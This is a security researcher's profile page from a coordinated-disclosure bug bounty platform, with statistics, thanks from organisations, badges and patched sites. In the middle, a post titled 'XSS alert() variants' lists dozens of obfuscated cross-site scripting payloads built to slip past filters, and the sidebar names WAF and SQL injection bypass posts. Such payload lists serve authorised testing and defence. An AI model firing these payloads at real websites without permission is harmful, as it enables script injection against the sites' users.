Report a Vulnerability
Submit, help fixing, get kudos.
Start a Bug Bounty
Run your bounty program for free.
741,842 coordinated disclosures
436,461 fixed vulnerabilities
1144 bug bounties with 2,195 websites
20,608 researchers, 1255 honor badges

Gh05tPTTop-50 VIP Open Redirect Reporter Top Security Researcher of the Month Top VIP Security Researcher of the Month | Security Researcher Profile


Security researcher Gh05tPT has already helped fix 7726 vulnerabilities.



Researcher reputation:  810

Real name:
#Gh05tPT #inurlBR #AccessSecLab

About me:
http://blog.inurl.com.br/
https://ccess.co/

How to contact me:
[email protected]
https://twitter.com/Gh05tPT
http://blog.inurl.com.br/
https://facebook.com/InurlBrasil
https://facebook.com/podzemie4544
https://facebook.com/exchangesec
https://ccess.co

Alternative Contacts:
http://blog.inurl.com.br/

Experience in Application Security
over 5 years

Award / Bug Bounty I prefer:
A thanks/profile recommendation will be really appreciated, but if you'd like:
paypal.me/Gh05tPT
# Bug Bounty ($$$)
# Hall Of Fame
# T-shirts, Sweats, Caps, Stickers, Keychains, etc

Halls of Fame:
https://www.pejadesign.com/chi-siamo/chi-siamo#manyThanks.
https://unite.un.org/content/hall-fame

Follow me on:
Twitter
Facebook

Recommendations and Acknowledgements

@xmbanet     13 January, 2021
    Twitter xmbanet Theocharis Manousaridis from BUSINESS NET ARCHITECTS S.A.:
Gh05tPT found an XSS vulnerability, provided us the information necessary in order to patch the vulnerability.
Thanks for your assistance!
@sczid     2 November, 2020
    Twitter sczid Zentraler Informatikdienst from University of Vienna:
Dear Gh05tPT,

The University of Vienna would like to thank you for your valuable contribution in finding multiple website security issues. Your input is highly welcome and helps to raise the security level of our educational institution.

Servus and greetings from Vienna, Austria.
@kitnospt     15 September, 2020
    Twitter kitnospt kitnospt from Hijiffy:
Thanks for your help, very professional and helpful.
@LKee6r     4 June, 2020
    Twitter LKee6r Johannes Segitz from SUSE:
Research privately disclosed XSS vulnerability. Thank you for the notification!
@IgnMa     19 May, 2020
    Twitter IgnMa Hypsas from Hypsas:
Gh05tPT found a XSS vulnerability on our site. Thanks so much
@CMS4BB     11 February, 2020
    Twitter CMS4BB Mark from CESA 6:
Gh05tPT found an XSS vulnerability, provided us the information necessary in order to patch the vulnerability. Thanks for your assistance!
@install28398408     15 January, 2020
    Twitter install28398408 evg from kuli:
thanks for Notification!
@lbl_jd     4 December, 2019
    Twitter lbl_jd Jeff Anderson from LBNL:
Gh05tPT found a XSS vulnerability on our site which I was able to fix quite quickly. Thanks for your help.
@Derek_Ortiz     25 November, 2019
    Twitter Derek_Ortiz Derek from Revize:
Thanks for the XSS report. We should be able to get the issue fixed next patch.
@ContatoFAME     13 November, 2019
    Twitter ContatoFAME Alexandre from DNOCS:
Thanks for the details about the failure found on one of our sites.

Shows the first 10 recommendations. See all.

Please login via Twitter to add a recommendation

Honor Badges


Number of Secured Websites

10+ Secured Websites Badge
50+ Secured Websites Badge
500+ Secured Websites Badge
Web Security Veteran Badge
10+ Websites
50+ Websites
500+ Websites
WEB SECURITY VETERAN
1000+ Websites

Advanced Security Research

WAF Bypasser Badge
CSRF Master Badge
AppSec Logic Master Badge
Fastest Fix Badge
WAF Bypasser
CSRF Master
30+ Reports
AppSec Logic Master
30+ Reports
Fastest Fix
Fix in 24 hours

Outstanding Achievements

Secured OBB Badge
OBB Advocate Badge
Improved OBB Badge
Secured OBB
OBB Advocate
Improved OBB

Commitment to Remediate and Patch

Patch Master Badge
Patch Guru Badge
Patch Lord Badge
Patch Master
55% Patched
Patch Guru
65% Patched
Patch Lord
75% Patched

Recommendations and Recognition

REPUTABLE Badge
FAMOUS Badge
GLOBALLY TRUSTED Badge
REPUTABLE
10+ Recommends
FAMOUS
25+ Recommends
GLOBALLY TRUSTED
50+ Recommends

Distinguished Blog Author

Distinguished Blog Author Badge
Distinguished Blog Author Badge
Distinguished Blog Author Badge
1 Post
3 Posts
5+ Posts

Research Statistics



Total reports:27829
Total reports on VIP sites:805
Total patched vulnerabilities:7726
Total vulnerabilities on Hold (Open Bug Bounty):1739
Recommendations received:51
Active since:05.04.2018
Top Security Researcher Awards:Gold Star Top Security Researcher of the Month Gold Star Top Security Researcher of the Month Gold Star Top Security Researcher of the Month Gold Star Top Security Researcher of the Month Gold Star Top Security Researcher of the Month Gold Star Top Security Researcher of the Month Gold Star Top Security Researcher of the Month Gold Star Top Security Researcher of the Month Gold Star Top Security Researcher of the Month
Top VIP Security Researcher Awards: Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Month Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week Top VIP Security Researcher of the Week

Open Bug Bounty Certificate


Researcher Certificate

04.04.2019  XSS alert() variants

<script>prompt(1)</script> 
<script>confirm(1)</script>
<script>var fn=window[490837..toString(1<<5)]; fn(atob('YWxlcnQoMSk='));</script>
<script>var fn=window[String.fromCharCode(101,118,97,108)]; fn(atob('YWxlcnQoMSk='));</script>
<script>var fn=window[atob('ZXZhbA==')];fn(atob('YWxlcnQoMSk=')); </script>
<script>window[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script> <script>this[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script> <script>this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](++[[]][+[]])</script> <script>this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))</script>
<script>'str1ng'.replace(/1/,alert)</script> <script>'bbbalert(1)cccc'.replace(/a\w{4}\(\d\)/,eval)</script> <script>'a1l2e3r4t6'.replace(/(.).(.).(.).(.).(.)/,function(match,$1,$2,$3,$4,$5) { this[$1+$2+$3+$4+$5](1); })</script>
<script>eval('\\u'+'0061'+'lert(1)')</script> <script>throw~delete~typeof~prompt(1)</script> <script>delete[a=alert]/prompt a(1)</script> <script>delete[a=this[atob('YWxlcnQ=')]]/prompt a(1)</script> <script>(()=>{return this})().alert(1)</script>
<script>new function(){new.target.constructor('alert(1)')();}</script> <script>Reflect.construct(function(){new.target.constructor('alert(1)')()},[])</script>
<link/rel=prefetch import href=data:q;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg>
<link rel="import" href="data:x,<script>alert(1)</script> <script>Array.from`1${alert}3${window}2`</script>
<script>!{x(){alert(1)}}.x()</script> <script>Array.from`${eval}alert\`1\``</script> <script>Array.from([1],alert)</script> <script>Promise.reject("1").then(null,alert)</script>
<svg </onload ="1> (_=alert,_(1)) "">
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
<marquee loop=1 width=0 onfinish=alert(1)>
<p onbeforescriptexecute="alert(1)"><svg><script>\</p>
<img onerror=alert(1) src <u></u> <videogt;<source onerror=javascript:prompt(911)gt;
<base target="<script>alert(1)</script>"><a href="javascript:name">CLICK</a>
<base href="javascript:/"><a href="**/alert(1)"><base href="javascript:/"><a href="**/alert(1)">
<style>@KeyFrames x{</style><div style=animation-name:x onanimationstart=alert(1)> <
<script>```${``[class extends[alert``]{}]}```</script> <script>[class extends[alert````]{}]</script>
<script>throw new class extends Function{}('alert(1)')``</script> <script>x=new class extends Function{}('alert(1)'); x=new x;</script> <script>new class extends alert(1){}</script>
<script>new class extends class extends class extends class extends alert(1){}{}{}{}</script>
<script>new Image()[unescape('%6f%77%6e%65%72%44%6f%63%75%6d%65%6e%74')][atob('ZGVmYXVsdFZpZXc=')][8680439..toString(30)](1)</script> <script src=data:,\u006fnerror=\u0061lert(1)></script>
"><svg><script/xlink:href="data:,alert(1) <svg><script/xlink:href=data:,alert(1)></script> <frameset/onpageshow=alert(1)>
<div onactivate=alert('Xss') id=xss style=overflow:scroll>
<div onfocus=alert('xx') id=xss style=display:table>

Reported Vulnerabilities

All Submissions VIP SubmissionsFeatured Submissions

  Latest Patched

 19.01.2021 gs1.org
 19.01.2021 embedsocial.com
 19.01.2021 gamasutra.com
 19.01.2021 b92.net
 17.01.2021 ndtv.com
 17.01.2021 splunk.com
 17.01.2021 tidal.com
 16.01.2021 liveinternet.ru
 16.01.2021 kickit.to
 16.01.2021 sante.fr

  Latest Blog Posts

25.12.2020 by _Y000_
How to bypass mod_security (WAF)
10.12.2020 by _Y000_
sql injection to bypass Mod_Security
10.12.2020 by _Y000_
Create encoded sql payloads
26.10.2020 by _r00t1ng_
Bypass Addslashes using Multibyte Character
26.10.2020 by _r00t1ng_
One Payload to Inject them all - MultiQuery Injection

  Recent Recommendations

@rantoniazzi     19 January, 2021
    Twitter rantoniazzi:
Thanks for pointing out a public phpinfo(). Very fast contact.
@driesvanhaver     19 January, 2021
    Twitter driesvanhaver:
We were informed of a vulnerability. Thank you to Praveen for telling us it existed.
@snowdarkz     19 January, 2021
    Twitter snowdarkz:
Thank you very much for the help with the vulnerability. Very fast contact.
@Cazz0r     19 January, 2021
    Twitter Cazz0r:
Massive thanks for Warbid for his vulnerability report sent directly to us! Thanks for making the web a safer place!
@CahEmiliano     18 January, 2021
    Twitter CahEmiliano:
Pramod is an excelent professional. He answer very quickly and help us to fix a security issue.
I recommend his skills and knowledge, he is a great cybersecurity expert.